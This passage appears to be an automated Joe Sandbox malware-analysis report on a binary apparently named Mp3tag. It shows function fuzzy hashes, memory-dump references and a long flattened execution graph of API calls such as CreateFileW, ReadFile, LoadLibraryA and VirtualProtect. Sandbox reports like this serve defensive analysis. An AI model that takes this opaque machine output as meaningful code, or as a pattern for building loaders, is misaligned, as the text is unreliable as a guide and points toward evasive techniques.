                                                                                                            • Opcode Fuzzy Hash: 083913806fa799246881c58492fe02d5fcd08b4e12b0d3b0e2f3b3cde12946e3
                                                                                                            • Instruction Fuzzy Hash: EB3190A2202A208ADB54DF35DA513E93765FF54BD9F446026FB4A87B58EF78C8C58340
                                                                                                            Function 0000000140478C80 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1385755141.0000000140001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.1385234433.0000000140000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1386873220.00000001407FC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1387026672.00000001409F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1387083878.00000001409F2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1387154879.0000000140A21000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1387154879.0000000140B6A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1387154879.0000000140B87000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1387154879.0000000140BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1387154879.0000000140BD2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1387154879.0000000140BEB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1387154879.0000000140C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_140000000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2933794660-0
                                                                                                            • Opcode ID: 5333740b583047bfee4dfc9733c7f7f44abed5e394a7778434ca90078ecc7095
                                                                                                            • Instruction ID: 006db4e703d68a9de7f89648ae9692377022bca78ac812106f6b1b2916ae84ec
                                                                                                            • Opcode Fuzzy Hash: 5333740b583047bfee4dfc9733c7f7f44abed5e394a7778434ca90078ecc7095
                                                                                                            • Instruction Fuzzy Hash: 0F111832711B048AEB01CF61E8643A833A4F75D799F441A29DB6D867A8DB78D1948380

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:7.9%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:1095
                                                                                                            Total number of Limit Nodes:15
                                                                                                            execution_graph 5902 4d26c9 5905 4d73f5 VirtualProtect 5902->5905 5909 4d6e7e 5905->5909 5908 4d26d1 5910 4d6e88 VirtualProtect 5909->5910 5910->5908 5951 4d8148 5954 4d7ed0 5951->5954 5955 4dd730 8 API calls 5954->5955 5956 4d7ede 5955->5956 5957 4d7ef9 5956->5957 5958 4d8af0 8 API calls 5956->5958 5973 4d50a0 5957->5973 5958->5957 5961 4dd730 8 API calls 5962 4d7f1c 5961->5962 5963 4dd730 8 API calls 5962->5963 5972 4d7f80 5962->5972 5964 4d7f30 5963->5964 5965 4d7f4c 5964->5965 5966 4d8af0 8 API calls 5964->5966 5967 4d50a0 8 API calls 5965->5967 5966->5965 5968 4d7f6b 5967->5968 5984 4d5020 5968->5984 5971 4dd730 8 API calls 5971->5972 5974 4dd730 8 API calls 5973->5974 5975 4d50ad 5974->5975 5976 4d5113 5975->5976 5977 4dd730 8 API calls 5975->5977 5976->5961 5978 4d50c3 5977->5978 5978->5976 5979 4dd730 8 API calls 5978->5979 5980 4d50dd 5979->5980 5981 4dd730 8 API calls 5980->5981 5982 4d5106 5981->5982 5982->5976 5983 4dd730 8 API calls 5982->5983 5983->5976 5985 4dd730 8 API calls 5984->5985 5986 4d502e 5985->5986 5987 4d5053 5986->5987 5993 4d51a0 5986->5993 5989 4dd730 8 API calls 5987->5989 5990 4d5058 5989->5990 5991 4dd730 8 API calls 5990->5991 5992 4d5068 5991->5992 5992->5971 5994 4d8ad0 8 API calls 5993->5994 5995 4d51b0 5994->5995 5995->5987 6541 4deac1 6542 4deb09 6541->6542 6543 4deaf6 6541->6543 6547 4d9660 6542->6547 6545 4d8d00 8 API calls 6543->6545 6546 4deb3c 6545->6546 6548 4d966f 6547->6548 6549 4d91c0 14 API calls 6548->6549 6550 4d96a2 6549->6550 6550->6543 6003 4d5c40 6017 4d6370 6003->6017 6006 4d5c75 6027 4d5c10 6006->6027 6007 4d5c84 6008 4d5c10 11 API calls 6007->6008 6010 4d5c91 6008->6010 6030 4da0b0 6010->6030 6011 4d5c82 6013 4d8cb0 8 API calls 6011->6013 6014 4d5cbe 6013->6014 6015 4d8cb0 8 API calls 6014->6015 6016 4d5cc7 6015->6016 6018 4d6385 6017->6018 6019 4d638a 6018->6019 6020 4d63f6 6018->6020 6022 4d639a 6019->6022 6025 4d63a7 6019->6025 6021 4d8cb0 8 API calls 6020->6021 6023 4d5c6e 6021->6023 6033 4dd1f0 6022->6033 6023->6006 6023->6007 6026 4dd1f0 11 API calls 6025->6026 6026->6023 6028 4dd1f0 11 API calls 6027->6028 6029 4d5c2a 6028->6029 6029->6011 6063 4d9920 6030->6063 6036 4dd110 6033->6036 6037 4d8cb0 8 API calls 6036->6037 6038 4dd133 6037->6038 6049 4dd19c 6038->6049 6050 4d9dc0 6038->6050 6039 4d8cb0 8 API calls 6041 4dd1a6 6039->6041 6041->6023 6042 4dd14f 6043 4dd186 6042->6043 6044 4dd176 6042->6044 6046 4d8cb0 8 API calls 6043->6046 6045 4d9dc0 11 API calls 6044->6045 6047 4dd184 6045->6047 6046->6047 6048 4d9270 11 API calls 6047->6048 6048->6049 6049->6039 6051 4d9dd6 6050->6051 6052 4d9de3 6050->6052 6053 4d8cb0 8 API calls 6051->6053 6054 4d9e45 6052->6054 6055 4d9df2 6052->6055 6060 4d9dde 6053->6060 6056 4d8b70 11 API calls 6054->6056 6057 4d9e0a 6055->6057 6058 4d5bd0 8 API calls 6055->6058 6061 4d9e4c 6056->6061 6059 4d4fa0 8 API calls 6057->6059 6058->6057 6059->6060 6060->6042 6061->6060 6062 4d8cb0 8 API calls 6061->6062 6062->6060 6064 4d994d 6063->6064 6065 4d9989 6063->6065 6064->6065 6070 4d5bd0 8 API calls 6064->6070 6066 4d99bc 6065->6066 6067 4d9994 6065->6067 6069 4d8b70 11 API calls 6066->6069 6068 4d9dc0 11 API calls 6067->6068 6072 4d99ac 6068->6072 6069->6072 6070->6064 6071 4d9a2f 6071->6011 6072->6071 6073 4d8cb0 8 API calls 6072->6073 6073->6071 6074 4d2940 FindFirstFileW 6075 521590 6074->6075 6076 4d5e40 6081 4d6020 6076->6081 6079 4d4f70 8 API calls 6080 4d5e58 6079->6080 6082 4d602c 6081->6082 6084 4d6053 6082->6084 6087 4da430 6082->6087 6091 4d6be0 6084->6091 6088 4da48d 6087->6088 6089 4da44b 6087->6089 6088->6082 6089->6088 6095 4da4d0 6089->6095 6092 4d6be9 6091->6092 6093 4d5e50 6092->6093 6136 4d6c10 6092->6136 6093->6079 6096 4da4f0 6095->6096 6107 4da561 6095->6107 6097 4da52e 6096->6097 6098 4da4fa 6096->6098 6100 4da548 6097->6100 6105 4da60d 6097->6105 6097->6107 6099 4da504 6098->6099 6106 4da5ce 6098->6106 6101 4da557 6099->6101 6108 4da50d 6099->6108 6102 4da555 6100->6102 6103 4da627 6100->6103 6118 4d8dc0 6101->6118 6122 4d8d90 6102->6122 6110 4d5220 8 API calls 6103->6110 6105->6107 6130 4db010 6105->6130 6106->6107 6111 4da430 8 API calls 6106->6111 6107->6089 6108->6107 6112 4da51f 6108->6112 6113 4da584 6108->6113 6110->6107 6111->6106 6112->6103 6116 4da52c 6112->6116 6113->6107 6126 4da4a0 6113->6126 6116->6107 6117 4da4d0 8 API calls 6116->6117 6117->6116 6119 4d8dcf 6118->6119 6120 4d8de2 6118->6120 6119->6120 6121 4d8d00 8 API calls 6119->6121 6120->6107 6121->6119 6123 4d8d9f 6122->6123 6124 4d8db2 6122->6124 6123->6124 6125 4d8cb0 8 API calls 6123->6125 6124->6107 6125->6123 6127 4da4ae 6126->6127 6128 4da4b6 6126->6128 6127->6113 6129 4d5220 8 API calls 6128->6129 6129->6127 6131 4db07d 6130->6131 6132 4db024 6130->6132 6131->6105 6132->6131 6133 4db071 6132->6133 6135 4da4d0 8 API calls 6132->6135 6134 4d4f70 8 API calls 6133->6134 6134->6131 6135->6133 6137 4d6c23 6136->6137 6138 4d4f70 8 API calls 6137->6138 6139 4d6c40 6138->6139 6139->6093 6551 4d41c0 6554 4d4120 6551->6554 6555 4d4175 6554->6555 6559 4d412d 6554->6559 6556 4d4180 VirtualAlloc 6555->6556 6557 4d41a3 6555->6557 6556->6557 6558 4d4138 Sleep 6558->6559 6559->6555 6559->6558 6560 4d4155 Sleep 6559->6560 6560->6559 5671 50ecc0 5672 50ece0 5671->5672 5673 50ed2e 5672->5673 5677 4ddb10 5672->5677 5678 4ddb2b 5677->5678 5691 4d8160 5678->5691 5681 4d8920 5682 4d8931 5681->5682 5685 4d893b 5681->5685 5894 4d8840 5682->5894 5683 4d8950 GetCurrentThreadId 5687 4d895d 5683->5687 5685->5683 5685->5687 5686 4d5150 GetStdHandle WriteFile GetStdHandle WriteFile TlsGetValue 5686->5687 5687->5686 5688 4d8a84 ExitProcess 5687->5688 5689 4d8a3b FreeLibrary 5687->5689 5689->5687 5692 4d818d GetCurrentThreadId 5691->5692 5693 4d8186 5691->5693 5694 4d81dc 5692->5694 5693->5692 5695 4d8299 5694->5695 5696 4d82a0 5694->5696 5700 4d80b0 5695->5700 5698 4d8920 8 API calls 5696->5698 5699 4d829e 5698->5699 5699->5681 5701 4d812d 5700->5701 5702 4d80c6 5700->5702 5701->5699 5702->5701 5705 4dd440 5702->5705 5714 4e6a10 5702->5714 5706 4dd458 5705->5706 5707 4dd511 5705->5707 5708 4dd463 SetThreadLocale 5706->5708 5707->5702 5718 4db390 InitializeCriticalSection GetVersion 5708->5718 5710 4dd46d 5711 4dd49c 5710->5711 5712 4dd4f1 GetCurrentThreadId 5711->5712 5721 4dd320 GetVersion 5712->5721 5715 4e6a30 5714->5715 5716 4e6a24 5714->5716 5715->5702 5723 4d83e0 5716->5723 5719 4db42f 5718->5719 5720 4db3c9 6 API calls 5718->5720 5719->5710 5720->5719 5722 4dd33f 5721->5722 5722->5707 5724 4d84aa 5723->5724 5728 4d841c 5723->5728 5769 4d8cb0 5724->5769 5726 4d84b5 5773 4d8d00 5726->5773 5728->5724 5736 4d83c0 5728->5736 5739 4d82c0 5728->5739 5746 4d9380 5728->5746 5752 4d8340 5728->5752 5759 4d9330 5728->5759 5763 4d9270 5728->5763 5777 4dd210 5736->5777 5740 4dd210 46 API calls 5739->5740 5741 4d82e6 5740->5741 5830 4d9830 5741->5830 5744 4d8cb0 8 API calls 5745 4d8300 5744->5745 5745->5728 5747 4d93b2 5746->5747 5748 4d939b 5746->5748 5749 4d8d00 8 API calls 5747->5749 5748->5747 5750 4d8bd0 14 API calls 5748->5750 5751 4d93ef 5749->5751 5750->5747 5751->5728 5753 4dd210 46 API calls 5752->5753 5754 4d8366 5753->5754 5870 4d9d70 5754->5870 5756 4d8373 5757 4d8cb0 8 API calls 5756->5757 5758 4d837d 5757->5758 5758->5728 5760 4d9341 5759->5760 5761 4d933c 5759->5761 5760->5728 5761->5760 5762 4d8c50 8 API calls 5761->5762 5762->5760 5764 4d928b 5763->5764 5768 4d929d 5763->5768 5767 4d8b70 11 API calls 5764->5767 5764->5768 5765 4d8cb0 8 API calls 5766 4d92d8 5765->5766 5766->5728 5767->5768 5768->5765 5770 4d8cbe 5769->5770 5771 4d8cea 5769->5771 5770->5771 5887 4d4f70 5770->5887 5771->5726 5774 4d8d0e 5773->5774 5775 4d84c7 5773->5775 5774->5775 5776 4d4f70 8 API calls 5774->5776 5775->5715 5776->5775 5778 4dd23d 5777->5778 5779 4d83d0 5777->5779 5780 4dd279 5778->5780 5781 4dd247 5778->5781 5779->5728 5796 4d9c90 5780->5796 5786 4db160 5781->5786 5784 4dd252 5790 4d8f00 5784->5790 5788 4db170 5786->5788 5789 4db18a 5786->5789 5788->5789 5800 4db100 5788->5800 5789->5784 5791 4d8f1f 5790->5791 5795 4d8f26 5790->5795 5815 4d8b70 5791->5815 5793 4d8cb0 8 API calls 5794 4d8f54 5793->5794 5794->5779 5795->5793 5797 4d9ca4 5796->5797 5798 4d8f00 11 API calls 5797->5798 5799 4d9cb2 5798->5799 5799->5779 5801 4db135 5800->5801 5802 4db116 5800->5802 5801->5789 5804 4dca80 GetModuleFileNameW 5802->5804 5805 4d9cc0 11 API calls 5804->5805 5806 4dcad5 5805->5806 5807 4d9c90 11 API calls 5806->5807 5808 4dcae2 5807->5808 5809 4dc830 45 API calls 5808->5809 5813 4dcaf3 5809->5813 5810 4d8d90 8 API calls 5811 4dcb28 5810->5811 5812 4d8cb0 8 API calls 5811->5812 5814 4dcb31 5812->5814 5813->5810 5814->5801 5816 4d8b7e 5815->5816 5817 4d8b9d 5815->5817 5818 4d8b8b 5816->5818 5827 4d5bd0 5816->5827 5817->5795 5821 4d4f40 5818->5821 5822 4d4f4f 5821->5822 5823 4d4f4a 5821->5823 5826 4d33c0 Sleep Sleep Sleep 5822->5826 5823->5817 5824 4d4f55 5824->5823 5825 4d5220 8 API calls 5824->5825 5825->5823 5826->5824 5828 4d51c0 8 API calls 5827->5828 5829 4d5bee 5828->5829 5829->5818 5831 4d9839 5830->5831 5832 4d9840 5830->5832 5833 4d8d00 8 API calls 5831->5833 5836 4d91c0 5832->5836 5835 4d82f6 5833->5835 5835->5744 5837 4d91db 5836->5837 5839 4d91e7 5836->5839 5838 4d8d00 8 API calls 5837->5838 5842 4d91e5 5838->5842 5844 4d9760 5839->5844 5841 4d921f 5841->5842 5843 4d8d00 8 API calls 5841->5843 5842->5835 5843->5842 5845 4d9776 5844->5845 5846 4d9783 5844->5846 5847 4d8d00 8 API calls 5845->5847 5848 4d97d1 5846->5848 5849 4d9792 5846->5849 5852 4d977e 5847->5852 5864 4d8bd0 5848->5864 5855 4d4fa0 5849->5855 5852->5841 5853 4d97db 5853->5852 5854 4d8d00 8 API calls 5853->5854 5854->5852 5856 4d4faf 5855->5856 5859 4d4fea 5855->5859 5857 4d4fce 5856->5857 5858 4d4fb4 5856->5858 5860 4d4fcc 5857->5860 5863 4d5220 8 API calls 5857->5863 5858->5860 5862 4d5220 8 API calls 5858->5862 5859->5860 5861 4d5220 8 API calls 5859->5861 5860->5852 5861->5860 5862->5860 5863->5860 5865 4d8be1 5864->5865 5869 4d8c05 5864->5869 5866 4d8bee 5865->5866 5867 4d5bd0 8 API calls 5865->5867 5868 4d6fce 6 API calls 5866->5868 5867->5866 5868->5869 5869->5853 5871 4d9d80 5870->5871 5873 4d9d79 5870->5873 5874 4d8f60 5871->5874 5873->5756 5875 4d8f6e 5874->5875 5876 4d8f78 5874->5876 5875->5873 5876->5875 5878 4d8c50 5876->5878 5881 4d51c0 5878->5881 5882 4d51d8 5881->5882 5883 4d51ec 5882->5883 5884 4dd730 8 API calls 5882->5884 5885 4d51a0 8 API calls 5883->5885 5884->5883 5886 4d5217 5885->5886 5886->5875 5888 4d4f7f 5887->5888 5889 4d4f7a 5887->5889 5888->5889 5891 4d5220 5888->5891 5889->5771 5892 4d51c0 8 API calls 5891->5892 5893 4d523c 5892->5893 5893->5889 5895 4d88de 5894->5895 5896 4d8852 GetStdHandle WriteFile GetStdHandle 5894->5896 5895->5685 5900 4d9730 5896->5900 5899 4d88bc WriteFile 5899->5895 5901 4d9739 5900->5901 5901->5899 6561 4e68da 6566 4eba3a 6561->6566 6564 4e69f5 6567 4eba3e 6566->6567 6568 4e6925 6566->6568 6575 4ec0e0 6567->6575 6568->6564 6570 4d85a0 6568->6570 6571 4d8600 6570->6571 6573 4d85b6 6570->6573 6571->6564 6572 4d8d00 8 API calls 6572->6573 6573->6571 6573->6572 6574 4d8cb0 8 API calls 6573->6574 6574->6573 6576 4ec157 6575->6576 6595 4ec14e 6575->6595 6577 4d8d90 8 API calls 6576->6577 6578 4ecfe7 6577->6578 6579 4d8cb0 8 API calls 6578->6579 6580 4ecff3 6579->6580 6580->6568 6581 4d9cc0 11 API calls 6581->6595 6582 4eb940 52 API calls 6582->6595 6583 4d9c40 11 API calls 6583->6595 6585 4eb3b0 17 API calls 6585->6595 6594 4edce0 17 API calls 6594->6595 6595->6576 6595->6581 6595->6582 6595->6583 6595->6585 6595->6594 6596 4eb110 6595->6596 6602 4eb180 6595->6602 6605 4eb390 6595->6605 6608 4d9c60 6595->6608 6612 4d9da0 6595->6612 6615 4d9d10 6595->6615 6621 4ec080 6595->6621 6626 4eb140 6595->6626 6632 4eb1a0 6595->6632 6597 4eb11c 6596->6597 6598 4eb12b 6596->6598 6635 4eacc0 6597->6635 6600 4eacc0 11 API calls 6598->6600 6601 4eb129 6600->6601 6601->6595 6603 4eacc0 11 API calls 6602->6603 6604 4eb193 6603->6604 6604->6595 6639 4eb1c0 6605->6639 6609 4d9c74 6608->6609 6653 4d90d0 6609->6653 6613 4d9000 11 API calls 6612->6613 6614 4d9dbb 6613->6614 6614->6595 6616 4d9d19 6615->6616 6617 4d9d20 6615->6617 6618 4d8cb0 8 API calls 6616->6618 6619 4d9000 11 API calls 6617->6619 6620 4d9d1e 6618->6620 6619->6620 6620->6595 6622 4d8cb0 8 API calls 6621->6622 6623 4ec0a3 6622->6623 6624 4ec0b7 6623->6624 6625 4d5220 8 API calls 6623->6625 6624->6595 6625->6624 6627 4eb15d 6626->6627 6628 4eb14d 6626->6628 6630 4eadf0 11 API calls 6627->6630 6667 4eadf0 6628->6667 6631 4eb15b 6630->6631 6631->6595 6633 4eadf0 11 API calls 6632->6633 6634 4eb1b3 6633->6634 6634->6595 6636 4eacd9 6635->6636 6637 4d9dc0 11 API calls 6636->6637 6638 4ead5d 6637->6638 6638->6601 6640 4eb1ee 6639->6640 6641 4eb204 6640->6641 6642 4eb251 6640->6642 6644 4dae30 17 API calls 6641->6644 6643 4dae30 17 API calls 6642->6643 6645 4eb222 6643->6645 6644->6645 6650 4f3d20 6645->6650 6647 4eb337 6648 4db010 8 API calls 6647->6648 6649 4eb348 6648->6649 6649->6595 6651 4d9dc0 11 API calls 6650->6651 6652 4f3d3d 6651->6652 6652->6647 6656 4d9000 6653->6656 6657 4d903c 6656->6657 6658 4d902e 6656->6658 6660 4d907c 6657->6660 6663 4d906a 6657->6663 6659 4d8cb0 8 API calls 6658->6659 6661 4d9037 6659->6661 6662 4d9dc0 11 API calls 6660->6662 6661->6595 6665 4d908f 6662->6665 6664 4d8f00 11 API calls 6663->6664 6664->6661 6666 4d9dc0 11 API calls 6665->6666 6666->6661 6668 4eae04 6667->6668 6669 4eae2f 6668->6669 6671 4eae3f 6668->6671 6670 4eacc0 11 API calls 6669->6670 6672 4eae3a 6670->6672 6673 4d9dc0 11 API calls 6671->6673 6672->6631 6673->6672 6679 4d79d8 6680 4d79ee 6679->6680 6681 4d768d 6679->6681 6682 4d7a06 6680->6682 6688 4d7150 6680->6688 6682->6681 6684 4d7b1e 6682->6684 6685 4d7b10 6682->6685 6708 4d7090 6684->6708 6698 4d70b0 6685->6698 6718 4d765e 6688->6718 6690 4d716e CreateFileW 6691 4d71e5 6690->6691 6692 4d7247 ReadFile 6691->6692 6697 4d720f 6691->6697 6693 4d7307 6692->6693 6694 4d73ad LoadLibraryA VirtualProtect 6693->6694 6695 4d74ef VirtualProtect 6694->6695 6696 4d6e7e 6694->6696 6695->6697 6696->6695 6697->6682 6699 4d70b6 6698->6699 6700 4d716e CreateFileW 6699->6700 6702 4d71e5 6700->6702 6701 4d720f 6701->6681 6702->6701 6703 4d7247 ReadFile 6702->6703 6704 4d7307 6703->6704 6705 4d73ad LoadLibraryA VirtualProtect 6704->6705 6706 4d74ef VirtualProtect 6705->6706 6707 4d6e7e 6705->6707 6706->6701 6707->6706 6709 4d70b6 6708->6709 6710 4d716e CreateFileW 6709->6710 6711 4d71e5 6710->6711 6712 4d7247 ReadFile 6711->6712 6717 4d720f 6711->6717 6713 4d7307 6712->6713 6714 4d73ad LoadLibraryA VirtualProtect 6713->6714 6715 4d74ef VirtualProtect 6714->6715 6716 4d6e7e 6714->6716 6715->6717 6716->6715 6717->6681 6719 4d7700 6718->6719 6719->6690 6143 4d6c50 6150 4d6c6d 6143->6150 6144 4d6cbb 6145 4d6c96 GetTickCount 6145->6150 6146 4d6d59 6149 4d6d5a GetTickCount 6146->6149 6153 4d6d89 GetTickCount 6146->6153 6154 4d6df9 6146->6154 6147 4d6caf GetTickCount 6147->6144 6147->6150 6148 4d6d1c GetTickCount 6148->6144 6148->6150 6149->6146 6150->6144 6150->6145 6150->6146 6150->6147 6150->6148 6151 4d6ce9 GetCurrentThreadId 6150->6151 6156 4d6950 6150->6156 6151->6144 6153->6146 6154->6144 6155 4d6dff GetCurrentThreadId 6154->6155 6155->6144 6157 4d695d 6156->6157 6158 4d6986 Sleep 6157->6158 6159 4d6993 6157->6159 6160 4d69af 6157->6160 6158->6160 6159->6160 6161 4d69a5 Sleep 6159->6161 6160->6150 6161->6160 6162 4d2950 InitializeCriticalSection 6163 521588 6162->6163 6164 4d5250 6165 4dd730 8 API calls 6164->6165 6166 4d525d 6165->6166 6167 4d527d 6166->6167 6168 4d51c0 8 API calls 6166->6168 6168->6167 6725 4d98d0 6726 4d98d9 6725->6726 6727 4d98e0 6725->6727 6729 4d90f0 6727->6729 6730 4d912c 6729->6730 6733 4d911e 6729->6733 6731 4d916c 6730->6731 6734 4d915a 6730->6734 6738 4d9b30 6731->6738 6733->6726 6735 4d8f60 8 API calls 6734->6735 6735->6733 6736 4d917f 6737 4d9b30 8 API calls 6736->6737 6737->6733 6739 4d9b43 6738->6739 6741 4d9b4a 6738->6741 6742 4d8c80 6739->6742 6741->6736 6743 4d8ca6 6742->6743 6744 4d8c8c 6742->6744 6743->6741 6744->6743 6745 4d8c50 8 API calls 6744->6745 6745->6743 6746 4d62d0 6747 4d62e5 6746->6747 6748 4d62ea 6747->6748 6749 4d6356 6747->6749 6751 4d62fa 6748->6751 6754 4d6307 6748->6754 6750 4d8cb0 8 API calls 6749->6750 6753 4d6305 6750->6753 6752 4dd1f0 11 API calls 6751->6752 6752->6753 6755 4dd1f0 11 API calls 6754->6755 6755->6753 6169 4d7b53 6170 4dd730 8 API calls 6169->6170 6171 4d7b87 6170->6171 6172 4dd730 8 API calls 6171->6172 6173 4d7c2e 6171->6173 6175 4d7cca 6171->6175 6172->6173 6174 4d50a0 8 API calls 6173->6174 6174->6175 6176 4ef350 6177 4d9270 11 API calls 6176->6177 6179 4ef317 6177->6179 6178 4d9270 11 API calls 6178->6179 6179->6176 6179->6178 6180 4ef3ac 6179->6180 6181 4efb20 46 API calls 6179->6181 6182 4d8d90 8 API calls 6180->6182 6181->6179 6183 4ef3bd 6182->6183 6187 4dd968 6188 4ddaeb 6187->6188 6191 4d7fa0 6188->6191 6192 4dd730 8 API calls 6191->6192 6193 4d7faf 6192->6193 6194 4d7fca 6193->6194 6195 4d8af0 8 API calls 6193->6195 6196 4d50a0 8 API calls 6194->6196 6195->6194 6197 4d7fe8 6196->6197 6200 4d7110 6197->6200 6201 4d70ff 6200->6201 6201->6200 6202 4d716e CreateFileW 6201->6202 6204 4d71e5 6202->6204 6203 4d720f 6204->6203 6205 4d7247 ReadFile 6204->6205 6206 4d7307 6205->6206 6207 4d73ad LoadLibraryA VirtualProtect 6206->6207 6208 4d74ef VirtualProtect 6207->6208 6209 4d6e7e 6207->6209 6208->6203 6209->6208 6762 4d5ee4 6763 4d5eea 6762->6763 6764 4d7e90 14 API calls 6763->6764 6765 4d5f0f 6764->6765 6210 4d6860 6211 4d6878 6210->6211 6214 4d67b0 6211->6214 6215 4d67d3 6214->6215 6216 4d6816 6215->6216 6218 4d65b0 MultiByteToWideChar MultiByteToWideChar 6215->6218 6219 4d663d 6218->6219 6219->6215 6220 4d8560 6221 4d8597 6220->6221 6222 4d8576 6220->6222 6222->6221 6223 4d9330 8 API calls 6222->6223 6223->6222 6224 4d2960 EnterCriticalSection 6225 521580 6224->6225 6226 4daa60 6231 4da640 6226->6231 6229 4d4f70 8 API calls 6230 4daa78 6229->6230 6232 4da4d0 8 API calls 6231->6232 6233 4da650 6232->6233 6233->6229 6766 4de4e0 6768 4de4f3 6766->6768 6767 4de604 6768->6767 6770 4ddbb0 6768->6770 6771 4ddbb5 6770->6771 6772 4ddce5 RaiseException 6771->6772 6775 4ddd13 6771->6775 6781 4dde05 6772->6781 6773 4dde51 6776 4dde59 GetLastError 6773->6776 6778 4ddebd 6773->6778 6774 4dde42 LoadLibraryA 6774->6773 6775->6773 6775->6774 6775->6781 6777 4dde6f 6776->6777 6777->6778 6779 4dde8c RaiseException 6777->6779 6778->6781 6782 4de680 LocalAlloc 6778->6782 6779->6781 6781->6768 6782->6781 6791 4dd3e0 6792 4dd438 6791->6792 6793 4dd3f4 6791->6793 6803 4d5740 6793->6803 6796 4d5740 8 API calls 6797 4dd40c 6796->6797 6798 4d5740 8 API calls 6797->6798 6799 4dd418 6798->6799 6800 4dd433 6799->6800 6801 4d4f70 8 API calls 6799->6801 6810 4d4ea0 6800->6810 6801->6800 6804 4d578e 6803->6804 6805 4d5754 6803->6805 6807 4d5290 8 API calls 6804->6807 6809 4d578c 6804->6809 6805->6804 6806 4d575c 6805->6806 6808 4d5290 8 API calls 6806->6808 6806->6809 6807->6809 6808->6809 6809->6796 6811 4d4eae 6810->6811 6812 4d4ed3 6811->6812 6818 4d44e0 6811->6818 6814 4d4edd VirtualFree 6812->6814 6815 4d4efe 6812->6815 6814->6815 6827 4d4d00 6815->6827 6823 4d44ee 6818->6823 6819 4d45ea 6821 4d4220 3 API calls 6819->6821 6825 4d4645 6819->6825 6820 4d49df 6820->6812 6821->6819 6823->6819 6833 4d42c0 6823->6833 6838 4d4220 6823->6838 6825->6820 6826 4d49c5 MessageBoxA 6825->6826 6826->6820 6828 4d4d27 6827->6828 6829 4d4d0e VirtualFree 6828->6829 6830 4d4d33 6828->6830 6829->6828 6831 4d4e6f 6830->6831 6832 4d4e4a VirtualFree 6830->6832 6831->6792 6832->6830 6837 4d431b 6833->6837 6834 4d44c9 6834->6823 6835 4d4220 3 API calls 6835->6837 6837->6834 6837->6835 6842 4d40e0 6837->6842 6839 4d4236 6838->6839 6841 4d423b 6838->6841 6840 4d4120 3 API calls 6839->6840 6840->6841 6841->6823 6845 4d4050 6842->6845 6846 4d406e 6845->6846 6847 4d40c5 6845->6847 6855 4d3f50 6846->6855 6847->6837 6850 4d3f50 VirtualQuery 6851 4d408d 6850->6851 6851->6847 6852 4d3f50 VirtualQuery 6851->6852 6853 4d40ae 6852->6853 6853->6847 6854 4d4050 VirtualQuery 6853->6854 6854->6847 6856 4d3f69 6855->6856 6858 4d3fe6 6855->6858 6857 4d3fb5 VirtualQuery 6856->6857 6856->6858 6857->6858 6858->6847 6858->6850 6859 4d68fc 6860 4d6907 6859->6860 6861 4d7e90 14 API calls 6860->6861 6862 4d690c 6861->6862 6863 4d7fa0 13 API calls 6862->6863 6864 4d6911 6863->6864 6237 4d7877 6238 4d7899 6237->6238 6239 4dd730 8 API calls 6238->6239 6240 4d78ef 6239->6240 6241 4dd730 8 API calls 6240->6241 6242 4d7949 6240->6242 6244 4d768d 6240->6244 6241->6242 6243 4d50a0 8 API calls 6242->6243 6243->6244 6245 4d5670 6246 4d5682 6245->6246 6247 4d51a0 8 API calls 6246->6247 6248 4d56a2 6247->6248 6249 4dd670 6250 4dd681 6249->6250 6251 4dd6a3 6249->6251 6252 4dd610 8 API calls 6250->6252 6253 4dd691 TlsGetValue 6252->6253 6253->6251 6871 4d64f0 6872 4d5c10 11 API calls 6871->6872 6873 4d6503 6872->6873 6874 4d69f0 6875 4d6a0f 6874->6875 6876 4d4f40 11 API calls 6875->6876 6881 4d6aa5 6875->6881 6877 4d6a49 6876->6877 6878 4d6a9a 6877->6878 6880 4d6a7e 6877->6880 6879 4d4f70 8 API calls 6878->6879 6879->6881 6883 4d6ad0 6880->6883 6884 4d4f70 8 API calls 6883->6884 6885 4d6aec 6884->6885 6885->6881 6254 4edb71 6255 4edb94 6254->6255 6256 4edb82 6254->6256 6258 4edbd8 6255->6258 6259 4edbc6 6255->6259 6265 4d92f0 6256->6265 6261 4d92f0 8 API calls 6258->6261 6260 4d92f0 8 API calls 6259->6260 6262 4edb92 6260->6262 6263 4d8cb0 8 API calls 6262->6263 6264 4edca5 6263->6264 6267 4d9305 6265->6267 6266 4d8cb0 8 API calls 6268 4d9320 6266->6268 6267->6266 6268->6262 6886 4dc288 6887 4dc2c8 RegCloseKey 6886->6887 6888 4dc2b1 6886->6888 6889 4d4f70 8 API calls 6888->6889 6889->6887 6272 4dcc00 6273 4dcc10 6272->6273 6277 4dcc31 6272->6277 6274 4dcc16 6273->6274 6273->6277 6276 4d4f70 8 API calls 6274->6276 6275 4dcc2f 6276->6275 6277->6275 6278 4d4f70 8 API calls 6277->6278 6278->6275 6279 4dd700 6280 4dd716 6279->6280 6281 4dd711 6279->6281 6283 4dd6b0 6281->6283 6284 4dd6c1 6283->6284 6285 4dd6f0 6283->6285 6284->6285 6286 4dd6ca TlsGetValue 6284->6286 